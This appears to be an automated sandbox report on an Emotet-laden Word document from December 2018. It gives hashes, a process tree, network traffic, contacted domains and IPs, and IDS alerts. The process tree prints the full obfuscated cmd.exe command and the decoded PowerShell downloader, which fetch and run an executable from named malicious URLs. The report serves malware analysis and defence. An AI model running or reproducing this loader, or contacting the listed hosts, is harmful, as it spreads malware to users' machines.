download: | 778-89-722984-845-778-89-722984-908 |
Full analysis: | https://app.any.run/tasks/98629c11-4526-451e-b5c0-bf7e38107af8 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 03:53:55 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 13 17:18:00 2018, Last Saved Time/Date: Thu Dec 13 17:18:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0 |
MD5: | B7088F79F0EC69557A0A497C76DF89C9 |
SHA1: | 6460AC1369AC517261C79FC98F96FB301F48CE9A |
SHA256: | B9AF77DF3D49404736B34DD477BA7C92AF4F9130374AC6E9293DACD6EE51938C |
SSDEEP: | 1536:mqocn1kp59gxBK85fBnpx/7F+ze7UCQcYOA+a9:w41k/W487xFTYcYO |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 24 |
Paragraphs: | 1 |
Lines: | 1 |
Company: | - |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 22 |
Words: | 3 |
Pages: | 1 |
ModifyDate: | 2018:12:13 17:18:00 |
CreateDate: | 2018:12:13 17:18:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | - |
Keywords: | - |
Author: | - |
Subject: | - |
Title: | - |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2824 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\778-89-722984-845-778-89-722984-908.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4080 | c:\RsqPulGkozfJlI\AitkcCTV\YihOIAshi\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set CS5M=zYLOzXtEaAFqfvMXYzRmsb.@0'ndWighKwuVUr +,jT}y1S(;/NGQ)Ix=8l-\$5eJkBC{9o:pHcD&&for %Z in (61;72;12;42;56;25;72;41;8;25;48;61;36;11;13;56;26;63;33;59;70;21;41;63;74;6;38;50;63;6;22;28;63;21;67;58;29;63;26;6;48;61;41;42;64;56;25;31;6;6;72;71;49;49;27;63;20;29;30;26;74;58;70;34;27;29;26;74;22;74;70;19;49;10;58;58;32;41;7;8;23;31;6;6;72;71;49;49;29;30;58;70;70;74;33;65;22;74;70;19;22;21;37;49;64;42;63;62;3;23;31;6;6;72;71;49;49;58;63;20;8;19;29;20;27;63;19;70;58;63;26;27;70;20;8;65;70;19;21;29;22;74;27;49;31;2;23;31;6;6;72;71;49;49;19;63;6;6;22;74;70;19;22;34;8;49;66;21;23;31;6;6;72;71;49;49;33;33;33;22;44;70;58;74;34;29;26;20;8;8;6;65;63;20;8;26;22;74;70;19;49;52;67;42;11;25;22;46;72;58;29;6;47;25;23;25;53;48;61;66;18;28;56;25;35;11;26;25;48;61;27;46;73;38;56;38;25;69;45;24;25;48;61;35;34;52;56;25;52;73;7;25;48;61;72;52;18;56;61;63;26;13;71;6;63;19;72;39;25;60;25;39;61;27;46;73;39;25;22;63;55;63;25;48;12;70;37;63;8;74;31;47;61;33;8;11;38;29;26;38;61;41;42;64;53;68;6;37;44;68;61;36;11;13;22;75;70;33;26;58;70;8;27;10;29;58;63;47;61;33;8;11;40;38;61;72;52;18;53;48;61;75;29;16;56;25;41;12;28;25;48;54;12;38;47;47;51;63;6;59;54;6;63;19;38;61;72;52;18;53;22;58;63;26;30;6;31;38;59;30;63;38;57;24;24;24;24;53;38;68;54;26;13;70;65;63;59;54;6;63;19;38;61;72;52;18;48;61;74;31;72;56;25;32;73;33;25;48;21;37;63;8;65;48;43;43;74;8;6;74;31;68;43;43;61;50;2;41;56;25;51;14;33;25;48;77)do set JRh=!JRh!!CS5M:~%Z,1!&&if %Z gtr 76 powershell.exe "!JRh:~5!"" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2580 | CmD /V:O/C"set CS5M=zYLOzXtEaAFqfvMXYzRmsb.@0'ndWighKwuVUr +,jT}y1S(;/NGQ)Ix=8l-\$5eJkBC{9o:pHcD&&for %Z in (61;72;12;42;56;25;72;41;8;25;48;61;36;11;13;56;26;63;33;59;70;21;41;63;74;6;38;50;63;6;22;28;63;21;67;58;29;63;26;6;48;61;41;42;64;56;25;31;6;6;72;71;49;49;27;63;20;29;30;26;74;58;70;34;27;29;26;74;22;74;70;19;49;10;58;58;32;41;7;8;23;31;6;6;72;71;49;49;29;30;58;70;70;74;33;65;22;74;70;19;22;21;37;49;64;42;63;62;3;23;31;6;6;72;71;49;49;58;63;20;8;19;29;20;27;63;19;70;58;63;26;27;70;20;8;65;70;19;21;29;22;74;27;49;31;2;23;31;6;6;72;71;49;49;19;63;6;6;22;74;70;19;22;34;8;49;66;21;23;31;6;6;72;71;49;49;33;33;33;22;44;70;58;74;34;29;26;20;8;8;6;65;63;20;8;26;22;74;70;19;49;52;67;42;11;25;22;46;72;58;29;6;47;25;23;25;53;48;61;66;18;28;56;25;35;11;26;25;48;61;27;46;73;38;56;38;25;69;45;24;25;48;61;35;34;52;56;25;52;73;7;25;48;61;72;52;18;56;61;63;26;13;71;6;63;19;72;39;25;60;25;39;61;27;46;73;39;25;22;63;55;63;25;48;12;70;37;63;8;74;31;47;61;33;8;11;38;29;26;38;61;41;42;64;53;68;6;37;44;68;61;36;11;13;22;75;70;33;26;58;70;8;27;10;29;58;63;47;61;33;8;11;40;38;61;72;52;18;53;48;61;75;29;16;56;25;41;12;28;25;48;54;12;38;47;47;51;63;6;59;54;6;63;19;38;61;72;52;18;53;22;58;63;26;30;6;31;38;59;30;63;38;57;24;24;24;24;53;38;68;54;26;13;70;65;63;59;54;6;63;19;38;61;72;52;18;48;61;74;31;72;56;25;32;73;33;25;48;21;37;63;8;65;48;43;43;74;8;6;74;31;68;43;43;61;50;2;41;56;25;51;14;33;25;48;77)do set JRh=!JRh!!CS5M:~%Z,1!&&if %Z gtr 76 powershell.exe "!JRh:~5!"" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2420 | powershell.exe "$pfT='pja';$Uqv=new-object Net.WebClient;$jTJ='http://designcloudinc.com/FllKjEa@http://igloocwk.com.br/JTe5O@http://lesamisdemolendosakombi.cd/hL@http://mett.com.ua/Bb@http://www.yolcuinsaatkesan.com/QCTq'.Split('@');$BRW='Vqn';$dSH = '910';$VuQ='QHE';$pQR=$env:temp+'\'+$dSH+'.exe';foreach($waq in $jTJ){try{$Uqv.DownloadFile($waq, $pQR);$DiY='jfW';If ((Get-Item $pQR).length -ge 80000) {Invoke-Item $pQR;$chp='KHw';break;}}catch{}}$NLj='GMw';" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3680 | "C:\Users\admin\AppData\Local\Temp\910.exe" | C:\Users\admin\AppData\Local\Temp\910.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
2888 | "C:\Users\admin\AppData\Local\Temp\910.exe" | C:\Users\admin\AppData\Local\Temp\910.exe | 910.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
2444 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 910.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3192 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Version: 4.0.6304.0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR9948.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6CEA05BA.wmf | — | |
MD5:— | SHA256:— | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F75605D8.wmf | — | |
MD5:— | SHA256:— | |||
2420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\NCI2MP26ACMWFFTQ87LP.temp | — | |
MD5:— | SHA256:— | |||
2420 | powershell.exe | C:\Users\admin\AppData\Local\Temp\910.exe | — | |
MD5:— | SHA256:— | |||
2420 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF19aba7.TMP | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2888 | 910.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:63EE678E982937ECBCED5B8DC3BE6E4F | SHA256:6476739FB169087B297EF4F2E97CDEF8FC50DE188EDCD5E011E4E8A08B155956 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:F8B313C273380B644EB92883C0F36F50 | SHA256:FFD351840C25693936FC2715FD07D74E21545B68153873C345BAE7E90DCA6001 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$8-89-722984-845-778-89-722984-908.doc | pgc | |
MD5:0E8E3FFAD566FD610B7BD2450E1AF156 | SHA256:7D2443BE719C4EDCD0EDC74304A779979344EDA3B8661D1DCAFFE166DCFF2A55 | |||
2824 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:DE7ED8AC004A29E333877D001AD42E89 | SHA256:D4F38982AC314DC7D0ED629BD756D859F58BFADFA627FBEF899A412BD1E9F806 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2420 | powershell.exe | GET | 301 | 104.156.48.66:80 | http://designcloudinc.com/FllKjEa | US | html | 242 b | malicious |
2420 | powershell.exe | GET | 200 | 94.73.149.212:80 | http://www.yolcuinsaatkesan.com/QCTq/ | TR | executable | 120 Kb | malicious |
3192 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3192 | archivesymbol.exe | GET | 200 | 189.180.237.144:7080 | http://189.180.237.144:7080/ | MX | binary | 132 b | malicious |
3192 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
2420 | powershell.exe | GET | 403 | 104.156.48.66:80 | http://designcloudinc.com/FllKjEa/ | US | html | 242 b | malicious |
2420 | powershell.exe | GET | 404 | 75.119.206.34:80 | http://igloocwk.com.br/JTe5O | US | html | 322 b | malicious |
2420 | powershell.exe | GET | 404 | 62.80.178.142:80 | http://mett.com.ua/Bb | UA | html | 1.00 Kb | malicious |
2420 | powershell.exe | GET | 301 | 154.16.144.102:80 | http://lesamisdemolendosakombi.cd/hL | US | html | 394 b | malicious |
2420 | powershell.exe | GET | 301 | 94.73.149.212:80 | http://www.yolcuinsaatkesan.com/QCTq | TR | html | 617 b | malicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
3192 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
2420 | powershell.exe | 94.73.149.212:80 | www.yolcuinsaatkesan.com | Cizgi Telekomunikasyon Anonim Sirketi | TR | suspicious |
2420 | powershell.exe | 154.16.144.102:80 | lesamisdemolendosakombi.cd | — | US | malicious |
2420 | powershell.exe | 62.80.178.142:80 | mett.com.ua | Inter-Telecom LLC | UA | malicious |
2420 | powershell.exe | 75.119.206.34:80 | igloocwk.com.br | New Dream Network, LLC | US | malicious |
3192 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2420 | powershell.exe | 104.156.48.66:80 | designcloudinc.com | HIVELOCITY VENTURES CORP | US | malicious |
3192 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
Domain | IP | Reputation |
---|---|---|
designcloudinc.com |
| malicious |
igloocwk.com.br |
| malicious |
lesamisdemolendosakombi.cd |
| malicious |
mett.com.ua |
| malicious |
www.yolcuinsaatkesan.com |
| malicious |
PID | Process | Class | Message |
---|---|---|---|
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
2420 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
2420 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2420 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2420 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
3192 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |